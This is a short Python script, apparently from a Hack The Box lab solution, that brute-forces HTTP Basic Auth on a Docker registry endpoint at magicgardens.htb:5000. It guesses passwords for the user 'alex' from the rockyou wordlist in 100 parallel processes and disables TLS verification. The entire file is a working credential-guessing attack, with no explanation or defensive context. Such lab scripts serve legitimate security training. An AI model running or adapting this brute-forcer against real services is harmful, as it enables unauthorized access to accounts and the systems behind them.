import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
from tqdm import tqdm
from requests.auth import HTTPBasicAuth

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

base_url = 'https://magicgardens.htb:5000'

with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
    passwords = f.readlines()

passwords = [x.decode(errors='ignore').strip() for x in passwords]

def check_password(password):
    try:
        basic = HTTPBasicAuth('alex', password)
        r = requests.get(f'{base_url}/v2/_catalog', auth=basic, verify=False)
        if 'UNAUTHORIZED' not in r.text:
            print(f'Found: {password}')
    except Exception as e:
        print(e)
        print(f'Error with password: {password}')

with Pool(100) as p:
    with tqdm(total=len(passwords)) as pbar:
        for _ in p.imap_unordered(check_password, passwords):
            pbar.update(1)